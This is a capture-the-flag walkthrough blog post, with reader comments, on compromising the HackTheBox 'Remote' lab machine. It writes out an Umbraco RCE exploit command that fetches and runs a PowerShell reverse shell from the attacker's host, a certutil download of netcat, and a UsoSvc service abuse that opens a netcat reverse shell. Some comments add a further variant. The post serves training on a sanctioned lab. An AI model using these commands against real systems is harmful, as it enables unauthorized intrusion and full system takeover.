Remote HacktheBox Walkthrough

Remote HackTheBox banner

This is Remote HackTheBox Walkthrough. In this writeup I will show you how I successfully exploited Remote machine and got root flag. The Remote machine is given difficulty level low by its maker. So without wasting time let’s jump into the box. Connect your PC with VPN so that you can get access to the Remote machine. Once successfully connected confirm by pinging the IP 10.10.10.180 [IP for Remote htb Machine].

Now I will show you how I got root to this machine.

First of all scanned the IP 10.10.10.180 so that I could get information about open ports and banner grab the services running on them. For this task used nmap (network port scanner). Here is the result

Port Scanning

$nmap -sC -sV -oA scan 10.10.10.180

Remote hackthebox nmap scan result

Nmap Result shows port 21 is open and ftp service is running on it. Also anonymous Login is allowed that’s interesting. So first of all tried to login with the credential anonymous : anonymous and got logged in successfully.

Anonymous FTP Login

$ftp 10.10.10.180

FTP Anonymous Login

All the command were working but they are not showing any output. Then tried to upload a blank text file named inject.txt but it gave me access denied permission. Then tried to download all the shared files (if any) from the ftp server in case I have missed some files from anonymous login.

$wget -m ftp://anonymous:[email protected]

FTP all file download from remote machine

which appeared that there is nothing to show or we don’t have enough permission to access them.

That’s all about ftp service.  Let’s move to other services

Enumerating on Port 80

Port 80 is open, so there may be some web server running over this port. Let’s check it.

After scrolling to bottom at http://10.10.10.180/ saw Umbraco HQ and on product page saw Umbraco printed on the jacket. Also, there were some balls and each have Umbraco written on it. Didn’t know why same thing is written on every page and pointing to Umbraco.

Seriously didn’t know. I downloaded the image of man from http://10.10.10.180/media/1002/18095416144_44a566a5f4_h.jpg by right clicking on it and then searched 18095416144_44a566a5f4_h.jpg on google. Luckily, found third link which is https://our.umbraco.com/documentation/Umbraco-Heartcore/API-Documentation/Content-Management/media/ and after going to the page saw that it is actually a CMS (a Content Management System just like WordPress).

So from above confirmed myself that this website is running on UMBRACO CMS which is an open source Content Management System. 

Tip: If you find any CMS being used then try to check over GitHub if there is any CMS scanner for particular CMS is present. If present then try to scan the website using that scanner. This may give you more accurate and fast result.

Till now I knew the CMS on which the website is running. To proceed further I needed installation folder of CMS and the version of CMS using which I could search for public exploit. Left it here and tried to find some other means by which I could get the installation folder and version of the CMS. Also, could not find any Umbraco CMS scanner over GitHub.

Port 111 is open, let’s enumerate it. It is running rpcbind service. The nmap scan report clearly shows rpcinfo (Remote Procedure Call Information) and list of ports along with their services. For confirmation and removal of false positive results you can use the command rpcinfo to reveal the exact running services.

Checking RPCinfo

$ rpcinfo -p 10.10.10.180

Remote HackTheBox walkthrough: rpcinfo check

Rpcinfo revealed that nfs [Network file System] and mounted services are running so used showmount command to list the directory which can be mounted on our local machine.

Checking Mount Directory

$showmount --exports 10.10.10.180

Remote HacktheBox machine mount check

Showmount command reveals that /site_backups can be mounted on our local machine.

So mounted the directory /site_backup on my local computer inside the folder mounted_folder in /tmp directory

Mounting to Local Computer

$mount --types nfs 10.10.10.180:/site_backups  /tmp/mounted_folder/

Remote machine mounting on local computer

Inside mounted_folder got Umbraco folder. So the installation URL for Umbraco is http://10.10.10.180/Umbraco/. Now I needed the version of Umbraco. No idea in which file it is present, except googling. And this helped me to find the answer. The version is 7.12.4 from

$cat Web.config | grep 'umbracoConfigurationStatus'

Remote Hackthebox macine version search

As soon as I got the version of Umbraco, immediately searched for available exploits using searchsploit (Command line tool for searching exploits on Exploit-db database). Got an exploit which is Authenticated Remote Code Execution (46153.py).

Search Available Exploits

$ searchsploit Umbraco 7.12.4

Remote Hackthebox Machine Exploit Search

After going to http://10.10.10.180/umbraco got login panel which requires username and password. Tried to login with default credentials admin : admin & admin : password but it failed. So tried to search in our mounted_folder if I could get some credentials.

After some enumeration got a file named Umbraco.sdf [.sdf file contains SQL database in compact form] and used strings command to view the file content and grep admin from the file which is shown below

$strings Umbraco.sdf | grep admin

HacktheBox Remote walkthrough  admin credential

It contains username : [email protected] and password in SHA1 hash form which is ‘b8be16afba8c314ad33d812f22a04991b90e2aaa‘. Tried to search the hash online on some public databases and luckily got its password on crackstation.net which is baconandcheese. So the login credential is [email protected] : baconandcheese.

Password Hash Search and find

Tip: If you get any hash then first of all try to search it online in databases like crackstation.net or others whether its value is present or not. If not found then try to crack it on your machine with custom wordlist using JohnTheRipper or HashCat

As there is an authenticated RCE vulnerability in Umbraco 7.12.4 so searched over GitHub for Umbraco RCE exploit and its usage. Got this link https://github.com/noraj/Umbraco-RCE and downloaded it. Then downloaded PowerShell script Invoke-PowerShellTcp.ps1 from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

which helps to connect back to the netcat listener on our PC. Replaced the old IP address with my local PC IP address port 5555.

Started python http server in one window and in another window started netcat listener with rlwrap command. Used rlwrap command so that after getting remote shell our backspace and tab button should function smoothly. After executing

Exploit Execution

$python exploit.py -u [email protected] -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"

Start Python Http Server

$python3  -m http.server 80

Start NetCat Listener

$rlwrap nc -nvlp 5555

HacktheBox Remote  walkthrough normal remote shell

Got remote shell. So using this exploit logged in successfully into the remote PC.

$ipconfig

remote htb machine ipaddress

Gathering some useful info

$systeminfo

Remote machine systeminfo

Let’s grab user flag

$type \Users\Public\user.txt

Remote Hackthebox user flag

Privilege Escalation

Finding PrivEsc Vector

To escalate privilege to admin level, first of all I had to know the Privilege Escalation vector only then I could proceed further towards the exploitation part. Used PowerUp.ps1 script to run remotely if I could get some possible privilege escalation vector. Using this command it run it directly on remote PC and then don’t forget to invoke all checks.

Running PrivEsc Script

$ IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/PowerUp.ps1')

$ Invoke-AllChecks

Tip: Every time you get access to any PC try to run some Enumeration Script, so that you can get information about privilege escalation vector.

Remote machine Privilege escalation script result

Service UsoSvc could be our potential privilege escalation vector. Let’s try to exploit it. To exploit this service we require a software that will execute command from this PC to remote machine. So downloaded netcat from https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip and downloaded nc64.exe to remote machine from my PC. And finally run the service abuse command as given in PowerUp.ps1 script output to get administrative remote shell.

Download nc64.exe to Remote

$certutil.exe -urlcache  -f  http://10.10.14.9/nc64.exe C:\\Windows\Temp\nc64.exe

Start Python Http Server Locally

$python3  -m http.server 80

Start NetCat Listener Locally

$rlwrap nc -nvlp 1234

Run the Service Abuse Command

$Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"

HacktheBox Remote  walkthrough Privilege escalation

We can see we have successfully got an administrative shell. Now we can get our root flag

Remote machine root flag

Hope you have got something to learn from Remote HackTheBox Walkthrough and my methodology. If yes, please comment in the comment section. For any query and suggestion feel free to contact us at [email protected]

This Post Has 8 Comments

  1. Abel Acosta

    me podias pasr el PowerUp.ps1 te voy agradecer.

  2. hokapefr

    Hi,

    It seems that this part ist not anymore functional :

    Invoke-ServiceAbuse -ServiceName ‘UsoSvc’ -Command “C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe”

    Start-Service : Service ‘Update Orchestrator Service (UsoSvc)’ cannot be started due to the following error: Cannot
    start service UsoSvc on computer ‘.’.
    At line:1812 char:34
    + … $TargetService | Start-Service -ErrorAction SilentlyContinue
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
    ServiceCommandException
    + FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand

    I worked around in doing this :

    Set-ServiceBinPath -ServiceName ‘UsoSvc’ “C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe”
    Restart-Service UsoSvc

    NOTICE : the service is only functional for around 5 mn, enough to catch the root flag, but why is it broken after this time period ? Antivirus ?

    Very good job done in this walkthrough !!

    Thanks,

  3. Noob

    How without given tun0 ip and port you were able to get reverse shell and where you had defined the port in 5555 script ??

  4. Deepak Kumar Maurya

    I have changed IP address to tun0 IP and port to 5555 in the powershell script PowerShellTcp.ps1 before downloading it to Remote HTB machine through python http server.

  5. Term

    Can you explain to me exactly what this Powershell statement does -i http://10.10.10.180/ -c powershell.exe -a “IEX (New-Object Net.WebClient) .DownloadString (‘http://10.10.14.9/Invoke -PowerShellTcp.ps1 ‘) “

    1. Deepak Kumar Maurya

      This statement will download and execute Invoke-PowerShellTcp.ps1 script simultaneously on remote machine by loading into the memory

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/